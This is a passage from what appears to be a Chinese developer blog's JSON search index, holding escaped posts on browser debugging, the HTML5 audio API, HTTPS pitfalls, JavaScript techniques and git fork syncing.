IE 如图所示是ie11的dev tool点击下拉箭头,也可以选择不同的iframe执行环境。\n3. 其他浏览器 其他浏览器可以自行摸索一下。。。(G_H)\n","permalink":"https://wdd.js.org/posts/2018/02/debug-code-in-iframe/","summary":"之前一直非常痛苦,在iframe外层根本获取不了里面的信息,后来使用了postMessage来传递消息实现,但是用起来还是非常不方便。\n其实浏览器本身是可以选择不同的iframe的执行环境的。例如有个变量是在iframe里面定义的,你只需要切换到这个iframe的执行环境,你就可以随意操作这个环境的任何变量了。\n这个小技巧,对于调试非常有用,但是我直到今天才发现。\n1. Chrome 这个小箭头可以让你选择不同的iframe的执行环境,可以切换到你的iframe环境里。\n2. IE 如图所示是ie11的dev tool点击下拉箭头,也可以选择不同的iframe执行环境。\n3. 其他浏览器 其他浏览器可以自行摸索一下。。。(G_H)","title":"如何在浏览器里调试iframe里层的代码?"},{"content":" 我觉得DOM就好像是元素周期表里的元素,JS就好像是实验器材,通过各种化学反应,产生各种魔术。\n1. Audio 通过打开谷歌浏览器的dev tools -\u0026gt; Settings -\u0026gt; Elements -\u0026gt; Show user agent shadow DOM, 你可以看到其实Audio标签也是由常用的 input标签和div等标签合成的。\n2. 基本用法 1 \u0026lt;audio src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34;\u0026gt; Your browser does not support the audio element. \u0026lt;/audio\u0026gt; \u0026lt;br\u0026gt; 2 \u0026lt;audio src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34; controls=\u0026#34;controls\u0026#34;\u0026gt; Your browser does not support the audio element. 
\u0026lt;/audio\u0026gt; \u0026lt;br\u0026gt; // controlsList属性目前只支持 chrome 58+ 3 \u0026lt;audio src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34; controls=\u0026#34;controls\u0026#34; controlsList=\u0026#34;nodownload\u0026#34;\u0026gt; Your browser does not support the audio element. \u0026lt;/audio\u0026gt; \u0026lt;br\u0026gt; 4 \u0026lt;audio controls=\u0026#34;controls\u0026#34;\u0026gt; \u0026lt;source src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34; type=\u0026#39;audio/mp3\u0026#39; /\u0026gt; \u0026lt;/audio\u0026gt; 你可以看出他们在Chrome里表现的差异\n关于audio标签支持的音频类型,可以参考Audio#Supported_audio_coding_formats\n3. 常用属性 autoplay: 音频流文件就绪后是否自动播放\npreload: \u0026ldquo;none\u0026rdquo; | \u0026ldquo;metadata\u0026rdquo; | \u0026ldquo;auto\u0026rdquo; | \u0026quot;\u0026quot;\n\u0026ldquo;none\u0026rdquo;: 无需预加载 \u0026ldquo;metadata\u0026rdquo;: 只需要加载元数据,例如音频时长,文件大小等。 \u0026ldquo;auto\u0026rdquo;: 自动优化下载整个流文件 controls: \u0026ldquo;controls\u0026rdquo; | \u0026quot;\u0026quot; 是否需要显示控件\nloop: \u0026ldquo;loop\u0026rdquo; or \u0026quot;\u0026quot; 是否循环播放\nmediagroup: string 多个视频或者音频流是否合并\nsrc: 音频地址\n4. API(重点) load(): 加载资源 play(): 播放 pause(): 暂停 canPlayType(): 询问浏览器以确定是否可以播放给定的MIME类型 buffered():指定文件的缓冲部分的开始和结束时间 5. 常用事件:Media Events(重点) 事件名 何时触发 loadstart 开始加载 progress 正在加载 suspend 用户代理有意无法获取媒体数据,无法获取整个文件 abort 主动终端下载资源并不是由于发生错误 error 获取资源时发生错误 play 开始播放 pause 播放暂停 loadedmetadata 刚获取完元数据 loadeddata 第一次渲染元数据 waiting 等待中 playing 正在播放 canplay 用户代理可以恢复播放媒体数据,但是估计如果现在开始播放,则媒体资源不能以当前播放速率直到其结束呈现,而不必停止进一步缓冲内容。 canplaythrough 用户代理估计,如果现在开始播放,则媒体资源可以以当前播放速率一直呈现到其结束,而不必停止进一步的缓冲。 timeupdate 当前播放位置作为正常播放的一部分而改变,或者以特别有趣的方式,例如不连续地改变。 ended 播放结束 ratechange 媒体播放速度改变 durationchange 媒体时长改变 volumechange 媒体声音大小改变 6. Audio DOM 属性(重点) 6.1. 只读属性 duration: 媒体时长,数值, 单位s ended: 是否完成播放,布尔值 paused: 是否播放暂停,布尔值 6.2. 
其他可读写属性(重点) playbackRate: 播放速度,大多数浏览器支持0.5-4, 1表示正常速度,设置该属性可以修改播放速度 volume:0.0-1.0之间,设置该属性可以修改声音大小 muted: 是否静音, 设置该属性可以静音 currentTime:指定播放位置的秒数 // 你可以使用元素的属性seekable来决定媒体目前能查找的范围。它返回一个你可以查找的TimeRanges 时间对象。 var mediaElement = document.getElementById(\u0026#39;mediaElementID\u0026#39;); mediaElement.seekable.start(); // 返回开始时间 (in seconds) mediaElement.seekable.end(); // 返回结束时间 (in seconds) mediaElement.currentTime = 122; // 设定在 122 seconds mediaElement.played.end(); // 返回浏览器播放的秒数 以下方法可以使音频以2倍速度播放。\n\u0026lt;audio id=\u0026#34;wdd\u0026#34; src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34; controls=\u0026#34;controls\u0026#34;\u0026gt; Your browser does not support the audio element. \u0026lt;/audio\u0026gt; \u0026lt;script\u0026gt; var myAudio = document.getElementById(\u0026#39;wdd\u0026#39;); myAudio.playbackRate = 2; \u0026lt;/script\u0026gt; 7. 常见问题及解决方法 录音无法拖动,播放一端就自动停止: https://wenjs.me/p/about-mp3progress-on-audio 如何隐藏Audio的下载按钮:https://segmentfault.com/a/1190000009737051 想找一个简单的录音播放插件: https://github.com/kolber/audiojs 8. 参考资料 W3C: the-audio-element\nwikipedia: HTML5 Audio\nW3C: HTML/Elements/audio\nNative Audio in the browser\nHTMLMediaElement.playbackRate\n使用 HTML5 音频和视频\n","permalink":"https://wdd.js.org/posts/2018/02/audio-heart-detail/","summary":"我觉得DOM就好像是元素周期表里的元素,JS就好像是实验器材,通过各种化学反应,产生各种魔术。\n1. Audio 通过打开谷歌浏览器的dev tools -\u0026gt; Settings -\u0026gt; Elements -\u0026gt; Show user agent shadow DOM, 你可以看到其实Audio标签也是由常用的 input标签和div等标签合成的。\n2. 基本用法 1 \u0026lt;audio src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34;\u0026gt; Your browser does not support the audio element. \u0026lt;/audio\u0026gt; \u0026lt;br\u0026gt; 2 \u0026lt;audio src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34; controls=\u0026#34;controls\u0026#34;\u0026gt; Your browser does not support the audio element. 
\u0026lt;/audio\u0026gt; \u0026lt;br\u0026gt; // controlsList属性目前只支持 chrome 58+ 3 \u0026lt;audio src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34; controls=\u0026#34;controls\u0026#34; controlsList=\u0026#34;nodownload\u0026#34;\u0026gt; Your browser does not support the audio element. \u0026lt;/audio\u0026gt; \u0026lt;br\u0026gt; 4 \u0026lt;audio controls=\u0026#34;controls\u0026#34;\u0026gt; \u0026lt;source src=\u0026#34;http://65.","title":"Audio 如果你愿意一层一层剥开我的心"},{"content":"1. HTTPS域向HTTP域发送请求会被浏览器直接拒绝,HTTP向HTTPS则不会 例如在github pages页面,这是一个https页面,如果在这个页面向http发送请求,那么会直接被浏览器拒绝,并在控制台输出下面的报错信息。\njquery-1.11.3.min.js:5 Mixed Content: The page at \u0026#39;https://wangduanduan.github.io/ddddddd/\u0026#39; was loaded over HTTPS, but requested an insecure XMLHttpRequest endpoint \u0026#39;http://cccccc/log/conf?token=welljoint\u0026#39;. This request has been blocked; the content must be served over HTTPS. 如果你在做第三方集成的系统,如果他们是在浏览器中直接调用你提供的接口,那么最好你使用https协议,这样无论对方是https还是http都可以访问。(相信我,这个很重要,我曾经经历过上线后遇到这个问题,然后连夜申请证书,把http升级到https的痛苦经历)\n2. HTTPS的默认端口是443,但不是只能用443 如果443端口已经被其他服务占用了,那么使用其他任何没有被占用的端口都可以用作HTTPS服务,只不过在请求的时候需要加上端口号罢了。\n3. 如何快速隐藏一个DOM元素 选中一个元素,然后按h,这时候就会在选中的DOM元素上加上__web-inspector-hide-shortcut__类,这个类会让元素隐藏。谷歌和火狐上都可以,IE上没有试过行不行。\n","permalink":"https://wdd.js.org/posts/2018/02/you-dont-know-https-and-http/","summary":"1. HTTPS域向HTTP域发送请求会被浏览器直接拒绝,HTTP向HTTPS则不会 例如在github pages页面,这是一个https页面,如果在这个页面向http发送请求,那么会直接被浏览器拒绝,并在控制台输出下面的报错信息。\njquery-1.11.3.min.js:5 Mixed Content: The page at \u0026#39;https://wangduanduan.github.io/ddddddd/\u0026#39; was loaded over HTTPS, but requested an insecure XMLHttpRequest endpoint \u0026#39;http://cccccc/log/conf?token=welljoint\u0026#39;. This request has been blocked; the content must be served over HTTPS. 如果你在做第三方集成的系统,如果他们是在浏览器中直接调用你提供的接口,那么最好你使用https协议,这样无论对方是https还是http都可以访问。(相信我,这个很重要,我曾经经历过上线后遇到这个问题,然后连夜申请证书,把http升级到https的痛苦经历)\n2. 
HTTPS的默认端口是443,但不是只能用443 如果443端口已经被其他服务占用了,那么使用其他任何没有被占用的端口都可以用作HTTPS服务,只不过在请求的时候需要加上端口号罢了。\n3. 如何快速隐藏一个DOM元素 选中一个元素,然后按h,这时候就会在选中的DOM元素上加上__web-inspector-hide-shortcut__类,这个类会让元素隐藏。谷歌和火狐上都可以,IE上没有试过行不行。","title":"可能被遗漏的https与http的知识点"},{"content":"英文好的,直接看原文\nhttps://blog.hospodarets.com/nodejs-debugging-in-chrome-devtools\n1. 要求 Node.js 6.3+ Chrome 55+ 2. 操作步骤 1 打开链接 chrome://flags/#enable-devtools-experiments 2 开启开发者工具实验性功能 3 重启浏览器 4 打开 DevTools Setting -\u0026gt; Experiments tab 5 按6次shift后,隐藏的功能会出现,勾选\u0026quot;Node debugging\u0026quot; 3. 运行程序 必须要有 --inspect\n\u0026gt; node --inspect www Debugger listening on port 9229. Warning: This is an experimental feature and could change at any time. To start debugging, open the following URL in Chrome: chrome-devtools://devtools/remote/serve_file/@60cd6e859b9f557d2312f5bf532f6aec5f284980/inspector.html?experiments=true\u0026amp;v8only=true\u0026amp;ws=localhost:9229/78a884f4-8c2e-459e-93f7-e1cbe87cf5cf 将这个地址粘贴到谷歌浏览器:chrome-devtools://devtools/remote/serve_file/@60cd6e859b9f557d2312f5bf532f6aec5f284980/inspector.html?experiments=true\u0026amp;v8only=true\u0026amp;ws=localhost:9229/78a884f4-8c2e-459e-93f7-e1cbe87cf5cf\n程序后端输出的日志也会输出到谷歌浏览器的console里面,同时也可以在Sources里进行断点调试了。 ","permalink":"https://wdd.js.org/posts/2018/02/debug-nodejs-in-chrome-devtool/","summary":"英文好的,直接看原文\nhttps://blog.hospodarets.com/nodejs-debugging-in-chrome-devtools\n1. 要求 Node.js 6.3+ Chrome 55+ 2. 操作步骤 1 打开链接 chrome://flags/#enable-devtools-experiments 2 开启开发者工具实验性功能 3 重启浏览器 4 打开 DevTools Setting -\u0026gt; Experiments tab 5 按6次shift后,隐藏的功能会出现,勾选\u0026quot;Node debugging\u0026quot; 3. 运行程序 必须要有 --inspect\n\u0026gt; node --inspect www Debugger listening on port 9229. Warning: This is an experimental feature and could change at any time. 
To start debugging, open the following URL in Chrome: chrome-devtools://devtools/remote/serve_file/@60cd6e859b9f557d2312f5bf532f6aec5f284980/inspector.html?experiments=true\u0026amp;v8only=true\u0026amp;ws=localhost:9229/78a884f4-8c2e-459e-93f7-e1cbe87cf5cf 将这个地址粘贴到谷歌浏览器:chrome-devtools://devtools/remote/serve_file/@60cd6e859b9f557d2312f5bf532f6aec5f284980/inspector.html?experiments=true\u0026amp;v8only=true\u0026amp;ws=localhost:9229/78a884f4-8c2e-459e-93f7-e1cbe87cf5cf\n程序后端输出的日志也会输出到谷歌浏览器的console里面,同时也可以在Sources里进行断点调试了。 ","title":"直接在Chrome DevTools调试Node.js"},{"content":"原文地址:https://hackernoon.com/few-simple-rules-for-good-coding-my-15-years-experience-96cb29d4acd9#.ddzpjb80c\n嗨,我作为程序员工作超过15年,用过许多不同的语言、范式、框架和其他狗屎。我想和大家分享我写好代码的规则。\n1. 优化VS可读性 去他妈的优化 始终编写易于阅读且对开发人员可理解的代码。因为在难以阅读的代码上花费的时间和资源将远远高于从优化中获得的。 如果你需要进行优化,那么把它做成像DI那样的独立模块,具有100%的测试覆盖率,并且至少一年不会被改动。\n2. 架构第一 我看到很多人说“我们需要快速做事,我们没有时间做架构”。其中约99%的人因为这样的想法而遇到了大问题。 编写代码而不考虑其架构是没有用的,就像只有愿望却没有实现计划一样。 在编写代码的第一行之前,你应该明白它将要做什么,它将如何使用,模块,服务如何相互工作,它将有什么结构,如何进行测试和调试,以及如何更新。\n3. 测试覆盖率 测试是好事,但它们并不总是负担得起,对项目有意义。\n当你需要测试:\n当你编写的模块或微服务至少一个月不会被改动时。 当你编写开源代码时。 当你编写核心代码或涉及金融渠道的代码时。 当您有资源在更新代码的同时更新测试时。 当你不需要测试时:\n当你在做一个创业项目时。 当你的团队很小、代码变更很快时。 当你编写的脚本可以简单地通过它们的输出手动测试时。 记住,带有严格测试的代码可能比没有测试的代码更有害。\n4. 保持简单,极度简单 不要编写复杂的代码。代码越简单,错误就越少,调试的时间也越少。代码只应该做它需要做的事,不要有太多的抽象和其他OOP shit(尤其是对java开发人员说的),再加上20%的余量,以便将来能以简单的方式更新它。\n5. 注释 出现注释说明你的代码不够好。好的代码应该是可以理解的,没有一行注释。但是如何为新开发人员节省时间? - 编写简单的内联文档,描述方法做什么以及如何工作。这将节省很多理解的时间,甚至更多 - 它将给人们更多的机会来提出这个方法更好的实现。并且它将是全局代码文档的良好开端。\n6. 硬耦合VS较小耦合 始终尝试使用微服务架构。单体软件可以比微服务软件运行得更快,但只能在一个服务器的上下文中运行。 微服务使您不仅可以在许多服务器上,有时甚至可以在一台机器上(我的意思是进程级分发)高效地分发您的软件。\n7. 代码审查 代码审查可以是好的,也可以是坏的。 只有当您的开发人员了解95%的代码,并且可以监控所有更新而不浪费很多时间时,您才可以组织代码审查。在其他情况下,这只会是耗时的,每个人都会讨厌这个。\n在这部分有很多问题,所以更深入地描述这一点。\n许多人认为代码审查是一个教新手或者教负责代码其他部分的队友的好方法。但是代码审查的主要目标是保持代码质量,而不是教学。让我们想象你的团队编写用于控制核反应堆或太空火箭发动机冷却系统的代码。你在非常复杂的逻辑中犯了巨大的错误,然后你把代码审查交给新来的家伙。你认为发生意外的风险有多大? - 根据我的实践,超过70%。\n良好的团队是每个人都有自己的角色,负责确切的工作。如果有人想要理解另一段代码,那么他可以去问负责它的人。你不可能知道一切,深入理解小块代码胜过泛泛地了解所有。\n8. 
重构没啥用 在我的职业生涯中,我听到很多次“不要担心,我们以后会重构它”。在未来,这会导致大的技术债务,或者只能删除所有代码从头重写。\n所以,不要背上技术债务,除非你有钱把你的软件从头开发几次。\n9. 当你累了或心情不好时不要写代码。 当开发人员疲倦时,他们制造的bug会多出2到5倍甚至更多。所以长时间工作是非常糟糕的做法。这就是为什么越来越多的国家在考虑6小时工作日,其中一些已经实行了。精神工作不同于使用你的二头肌。\n10. 不要一次写全部 - 使开发迭代 在编写代码之前,分析和预测您的客户/用户真正需要什么,然后选择您可以在短期内以高质量开发的MVF(最有价值的功能)。使用这样的迭代来部署质量更新,而不是把时间和资源浪费在不合理的愿望上并牺牲质量。\n11. 自动化VS手动 从长期来看,自动化是100%成功的。所以如果你有资源自动化某些东西,现在就应该做。你可能认为“只需要5分钟,为什么我应该自动化?”但让我们算一算。例如,这是5个开发人员的日常任务。 5分钟* 5天* 21天* 12个月= 6 300分钟= 105小时= 13.125天〜5250 $。 如果你有40 000名员工,这将需要多少费用?\n12. 出去浪,学习新爱好 换一种活动可以增加心智能力,并提供新想法。所以,暂停现在的工作,出去呼吸一下新鲜空气,与朋友交谈,弹吉他等。 ps: 莫春者,春服既成,冠者五六人,童子六七人,浴乎沂,风乎舞雩,咏而归。------《论语.先进》。\n13. 在空闲时间学习新事物 当人们停止学习时,他们开始退化。\n","permalink":"https://wdd.js.org/posts/2018/02/few-simple-rules-for-good-coding-my-15-years-experience/","summary":"原文地址:https://hackernoon.com/few-simple-rules-for-good-coding-my-15-years-experience-96cb29d4acd9#.ddzpjb80c\n嗨,我作为程序员工作超过15年,用过许多不同的语言、范式、框架和其他狗屎。我想和大家分享我写好代码的规则。\n1. 优化VS可读性 去他妈的优化 始终编写易于阅读且对开发人员可理解的代码。因为在难以阅读的代码上花费的时间和资源将远远高于从优化中获得的。 如果你需要进行优化,那么把它做成像DI那样的独立模块,具有100%的测试覆盖率,并且至少一年不会被改动。\n2. 架构第一 我看到很多人说“我们需要快速做事,我们没有时间做架构”。其中约99%的人因为这样的想法而遇到了大问题。 编写代码而不考虑其架构是没有用的,就像只有愿望却没有实现计划一样。 在编写代码的第一行之前,你应该明白它将要做什么,它将如何使用,模块,服务如何相互工作,它将有什么结构,如何进行测试和调试,以及如何更新。\n3. 测试覆盖率 测试是好事,但它们并不总是负担得起,对项目有意义。\n当你需要测试:\n当你编写的模块或微服务至少一个月不会被改动时。 当你编写开源代码时。 当你编写核心代码或涉及金融渠道的代码时。 当您有资源在更新代码的同时更新测试时。 当你不需要测试时:\n当你在做一个创业项目时。 当你的团队很小、代码变更很快时。 当你编写的脚本可以简单地通过它们的输出手动测试时。 记住,带有严格测试的代码可能比没有测试的代码更有害。\n4. 保持简单,极度简单 不要编写复杂的代码。代码越简单,错误就越少,调试的时间也越少。代码只应该做它需要做的事,不要有太多的抽象和其他OOP shit(尤其是对java开发人员说的),再加上20%的余量,以便将来能以简单的方式更新它。\n5. 注释 出现注释说明你的代码不够好。好的代码应该是可以理解的,没有一行注释。但是如何为新开发人员节省时间? - 编写简单的内联文档,描述方法做什么以及如何工作。这将节省很多理解的时间,甚至更多 - 它将给人们更多的机会来提出这个方法更好的实现。并且它将是全局代码文档的良好开端。\n6. 硬耦合VS较小耦合 始终尝试使用微服务架构。单体软件可以比微服务软件运行得更快,但只能在一个服务器的上下文中运行。 微服务使您不仅可以在许多服务器上,有时甚至可以在一台机器上(我的意思是进程级分发)高效地分发您的软件。\n7. 
代码审查 代码审查可以是好的,也可以是坏的。 只有当您的开发人员了解95%的代码,并且可以监控所有更新而不浪费很多时间时,您才可以组织代码审查。在其他情况下,这只会是耗时的,每个人都会讨厌这个。\n在这部分有很多问题,所以更深入地描述这一点。\n许多人认为代码审查是一个教新手或者教负责代码其他部分的队友的好方法。但是代码审查的主要目标是保持代码质量,而不是教学。让我们想象你的团队编写用于控制核反应堆或太空火箭发动机冷却系统的代码。你在非常复杂的逻辑中犯了巨大的错误,然后你把代码审查交给新来的家伙。你认为发生意外的风险有多大? - 根据我的实践,超过70%。\n良好的团队是每个人都有自己的角色,负责确切的工作。如果有人想要理解另一段代码,那么他可以去问负责它的人。你不可能知道一切,深入理解小块代码胜过泛泛地了解所有。\n8. 重构没啥用 在我的职业生涯中,我听到很多次“不要担心,我们以后会重构它”。在未来,这会导致大的技术债务,或者只能删除所有代码从头重写。\n所以,不要背上技术债务,除非你有钱把你的软件从头开发几次。\n9. 当你累了或心情不好时不要写代码。 当开发人员疲倦时,他们制造的bug会多出2到5倍甚至更多。所以长时间工作是非常糟糕的做法。这就是为什么越来越多的国家在考虑6小时工作日,其中一些已经实行了。精神工作不同于使用你的二头肌。\n10. 不要一次写全部 - 使开发迭代 在编写代码之前,分析和预测您的客户/用户真正需要什么,然后选择您可以在短期内以高质量开发的MVF(最有价值的功能)。使用这样的迭代来部署质量更新,而不是把时间和资源浪费在不合理的愿望上并牺牲质量。\n11. 自动化VS手动 从长期来看,自动化是100%成功的。所以如果你有资源自动化某些东西,现在就应该做。你可能认为“只需要5分钟,为什么我应该自动化?”但让我们算一算。例如,这是5个开发人员的日常任务。 5分钟* 5天* 21天* 12个月= 6 300分钟= 105小时= 13.","title":"【译】13简单的优秀编码规则(从我15年的经验)"},{"content":"0.1. 安全类型检测 javascript内置类型检测并不可靠 safari某些版本(\u0026lt;4)typeof正则表达式返回为function 建议使用Object.prototype.toString.call()方法检测数据类型\nfunction isArray(value){ return Object.prototype.toString.call(value) === \u0026#34;[object Array]\u0026#34;; } function isFunction(value){ return Object.prototype.toString.call(value) === \u0026#34;[object Function]\u0026#34;; } function isRegExp(value){ return Object.prototype.toString.call(value) === \u0026#34;[object RegExp]\u0026#34;; } function isNativeJSON(){ return window.JSON \u0026amp;\u0026amp; Object.prototype.toString.call(JSON) === \u0026#34;[object JSON]\u0026#34;; } 对于ie中以COM对象形式实现的任何函数,isFunction都返回false,因为它们并非原生的javascript函数。\n在web开发中,能够区分原生与非原生的对象非常重要。只有这样才能确切知道某个对象是否有哪些功能\n以上所有的正确性的前提是:Object.prototype.toString没有被修改过\n0.2. 
作用域安全的构造函数 function Person(name){ this.name = name; } //使用new来创建一个对象 var one = new Person(\u0026#39;wdd\u0026#39;); //直接调用构造函数 Person(); 由于this是运行时分配的,如果你使用new来操作,this指向的就是one。如果直接调用构造函数,那么this会指向全局对象window,然后你的代码就会覆盖window的原生name。如果有其他地方使用过window.name, 那么你的函数将会埋下一个深藏的bug。\n==那么,如何才能创建一个作用域安全的构造函数?== 方法1\nfunction Person(name){ if(this instanceof Person){ this.name = name; } else{ return new Person(name); } } 1. 惰性载入函数 假设有一个方法X,在A类浏览器里叫A,在b类浏览器里叫B,有些浏览器并没有这个方法,你想实现一个跨浏览器的方法。\n惰性载入函数的思想是:在函数内部改变函数自身的执行逻辑\nfunction X(){ if(A){ return new A(); } else{ if(B){ return new B(); } else{ throw new Error(\u0026#39;no A or B\u0026#39;); } } } 换一种写法\nfunction X(){ if(A){ X = function(){ return new A(); }; } else{ if(B){ X = function(){ return new B(); }; } else{ throw new Error(\u0026#39;no A or B\u0026#39;); } } return new X(); } 2. 防篡改对象 2.1. 不可扩展对象 Object.preventExtensions // 下面代码在谷歌浏览器中执行 \u0026gt; var person = {name: \u0026#39;wdd\u0026#39;}; undefined \u0026gt; Object.preventExtensions(person); Object {name: \u0026#34;wdd\u0026#34;} \u0026gt; person.age = 10 10 \u0026gt; person Object {name: \u0026#34;wdd\u0026#34;} \u0026gt; Object.isExtensible(person) false 2.2. 密封对象Object.seal 密封对象不可扩展,并且不能删除对象的属性或者方法。但是属性值可以修改。\n\u0026gt; var one = {name: \u0026#39;hihi\u0026#39;} undefined \u0026gt; Object.seal(one) Object {name: \u0026#34;hihi\u0026#34;} \u0026gt; one.age = 12 12 \u0026gt; one Object {name: \u0026#34;hihi\u0026#34;} \u0026gt; delete one.name false \u0026gt; one Object {name: \u0026#34;hihi\u0026#34;} 2.3. 冻结对象 Object.freeze 最严格的防篡改就是冻结对象。对象不可扩展,而且密封,不能修改。只能访问。\n3. 高级定时器 3.1. 函数节流 函数节流的思想是:某些代码不可以没有间断的连续重复执行\nvar processor = { timeoutId: null, // 实际进行处理的方法 performProcessing: function(){ ... }, // 初始化调用方法 process: function(){ clearTimeout(this.timeoutId); var that = this; this.timeoutId = setTimeout(function(){ that.performProcessing(); }, 100); } } // 尝试开始执行 processor.process(); 3.2. 
中央定时器 页面如果有十个区域要动态显示当前时间,一般来说,可以用10个定时器来实现。其实一个中央定时器就可以搞定。\n中央定时器动画 demo地址:http://wangduanduan.coding.me/my-all-demos/ninja/center-time-control.html\nvar timers = { timerId: 0, timers: [], add: function(fn){ this.timers.push(fn); }, start: function(){ if(this.timerId){ return; } (function runNext(){ if(timers.timers.length \u0026gt; 0){ for(var i=0; i \u0026lt; timers.timers.length ; i++){ if(timers.timers[i]() === false){ timers.timers.splice(i, 1); i--; } } timers.timerId = setTimeout(runNext, 16); } })(); }, stop: function(){ clearTimeout(timers.timerId); this.timerId = 0; } }; 参考书籍: 《javascript高级程序设计》 《javascript忍者秘籍》\n","permalink":"https://wdd.js.org/posts/2018/02/js-high-skills/","summary":"0.1. 安全类型检测 javascript内置类型检测并不可靠 safari某些版本(\u0026lt;4)typeof正则表达式返回为function 建议使用Object.prototype.toString.call()方法检测数据类型\nfunction isArray(value){ return Object.prototype.toString.call(value) === \u0026#34;[object Array]\u0026#34;; } function isFunction(value){ return Object.prototype.toString.call(value) === \u0026#34;[object Function]\u0026#34;; } function isRegExp(value){ return Object.prototype.toString.call(value) === \u0026#34;[object RegExp]\u0026#34;; } function isNativeJSON(){ return window.JSON \u0026amp;\u0026amp; Object.prototype.toString.call(JSON) === \u0026#34;[object JSON]\u0026#34;; } 对于ie中以COM对象形式实现的任何函数,isFunction都返回false,因为它们并非原生的javascript函数。\n在web开发中,能够区分原生与非原生的对象非常重要。只有这样才能确切知道某个对象是否有哪些功能\n以上所有的正确性的前提是:Object.prototype.toString没有被修改过\n0.2. 作用域安全的构造函数 function Person(name){ this.name = name; } //使用new来创建一个对象 var one = new Person(\u0026#39;wdd\u0026#39;); //直接调用构造函数 Person(); 由于this是运行时分配的,如果你使用new来操作,this指向的就是one。如果直接调用构造函数,那么this会指向全局对象window,然后你的代码就会覆盖window的原生name。如果有其他地方使用过window.name, 那么你的函数将会埋下一个深藏的bug。\n==那么,如何才能创建一个作用域安全的构造函数?== 方法1\nfunction Person(name){ if(this instanceof Person){ this.name = name; } else{ return new Person(name); } } 1.","title":"JavaScript 高级技巧"},{"content":"0.1. 先看题:mean的值是什么? 
var scores = [10,11,12]; var total = 0; for(var score in scores){ total += score; } var mean = total/scores.length; console.log(mean); 0.2. 是11? 恭喜你:答错了!\n0.3. 是1? 恭喜你:答错了!\n0.4. 正确答案: 4 解释: for in 循环,循环的值永远是key, key是一个字符串。所以total的值是:\u0026lsquo;0012\u0026rsquo;。它是一个字符串,字符串'0012\u0026rsquo;/3,0012会被转换成12,然后除以3,结果是4。\n0.5. 后记 这个示例是来自《编写高质量JavaScript的68个方法》的第49条:数组迭代要优先使用for循环而不是for in循环。 既然已经发布,就可能有好事者拿出去当面试题。这个题目很有可能坑一堆人。其中包括我。\n这里涉及到许多js的基础知识.\nfor in 循环是循环对象的索引属性,key是一个字符串。 数值类型和字符串相加,会自动转换为字符串 字符串除以数值类型,会先把字符串转为数值,最终结果为数值 正确方法\nvar scores = [10,11,12]; var total = 0; for(var i=0, n=scores.length; i \u0026lt; n; i++){ total += scores[i]; } var mean = total/scores.length; console.log(mean); 这样写有几个好处。\n循环的终止条件简单且明确 即使在循环体内修改了数组,也能有效的终止循环。否则就可能变成死循环。 编译器很难保证重新计算scores.length是安全的。 提前确定了循环终止条件,避免多次计算数组长度。这个可能会被一些浏览器优化。 ","permalink":"https://wdd.js.org/posts/2018/02/i-realy-dont-know-js/","summary":"0.1. 先看题:mean的值是什么? var scores = [10,11,12]; var total = 0; for(var score in scores){ total += score; } var mean = total/scores.length; console.log(mean); 0.2. 是11? 恭喜你:答错了!\n0.3. 是1? 恭喜你:答错了!\n0.4. 正确答案: 4 解释: for in 循环,循环的值永远是key, key是一个字符串。所以total的值是:\u0026lsquo;0012\u0026rsquo;。它是一个字符串,字符串'0012\u0026rsquo;/3,0012会被转换成12,然后除以3,结果是4。\n0.5. 后记 这个示例是来自《编写高质量JavaScript的68个方法》的第49条:数组迭代要优先使用for循环而不是for in循环。 既然已经发布,就可能有好事者拿出去当面试题。这个题目很有可能坑一堆人。其中包括我。\n这里涉及到许多js的基础知识.\nfor in 循环是循环对象的索引属性,key是一个字符串。 数值类型和字符串相加,会自动转换为字符串 字符串除以数值类型,会先把字符串转为数值,最终结果为数值 正确方法\nvar scores = [10,11,12]; var total = 0; for(var i=0, n=scores.length; i \u0026lt; n; i++){ total += scores[i]; } var mean = total/scores.","title":"突然觉得自己好像没学过JS"},{"content":"0.1. 同步Ajax 这种需求主要用于当浏览器关闭,或者刷新时,向后端发起Ajax请求。\nwindow.onunload = function(){ $.ajax({url:\u0026#34;http://localhost:8888/test.php?\u0026#34;, async:false}); }; 使用async:false参数使请求同步(默认是异步的)。\n同步请求锁定浏览器,直到完成。 如果请求是异步的,页面只是继续卸载。 它足够快,以至于该请求甚至没有时间触发。服务端很可能收不到请求。\n0.2. 
navigator.sendBeacon 优点:简洁、异步、非阻塞 缺点:这是实验性的技术,并非所有浏览器都支持。其中IE和safari不支持该技术。\n示例:\nwindow.addEventListener(\u0026#39;unload\u0026#39;, logData, false); function logData() { navigator.sendBeacon(\u0026#34;/log\u0026#34;, analyticsData); } 参考:http://stackoverflow.com/questions/1821625/ajax-request-with-jquery-on-page-unload 参考:https://developer.mozilla.org/en-US/docs/Web/API/Navigator/sendBeacon\n","permalink":"https://wdd.js.org/posts/2018/02/send-ajax-when-page-unload/","summary":"0.1. 同步Ajax 这种需求主要用于当浏览器关闭,或者刷新时,向后端发起Ajax请求。\nwindow.onunload = function(){ $.ajax({url:\u0026#34;http://localhost:8888/test.php?\u0026#34;, async:false}); }; 使用async:false参数使请求同步(默认是异步的)。\n同步请求锁定浏览器,直到完成。 如果请求是异步的,页面只是继续卸载。 它足够快,以至于该请求甚至没有时间触发。服务端很可能收不到请求。\n0.2. navigator.sendBeacon 优点:简洁、异步、非阻塞 缺点:这是实验性的技术,并非所有浏览器都支持。其中IE和safari不支持该技术。\n示例:\nwindow.addEventListener(\u0026#39;unload\u0026#39;, logData, false); function logData() { navigator.sendBeacon(\u0026#34;/log\u0026#34;, analyticsData); } 参考:http://stackoverflow.com/questions/1821625/ajax-request-with-jquery-on-page-unload 参考:https://developer.mozilla.org/en-US/docs/Web/API/Navigator/sendBeacon","title":"发起Ajax请求当页面onunload"},{"content":"1. 前提说明 仓库A: http://gitlab.tt.cc:30000/fe/omp.git 仓库B: 仓库B fork自仓库A, 仓库B的地址是:http://gitlab.tt.cc:30000/wangdd/omp.git 某一时刻,仓库A更新了。仓库B需要同步上游分支的更新。\n2. 本地操作 // 1 查看远程分支 ➜ omp git:(master) git remote -v origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git 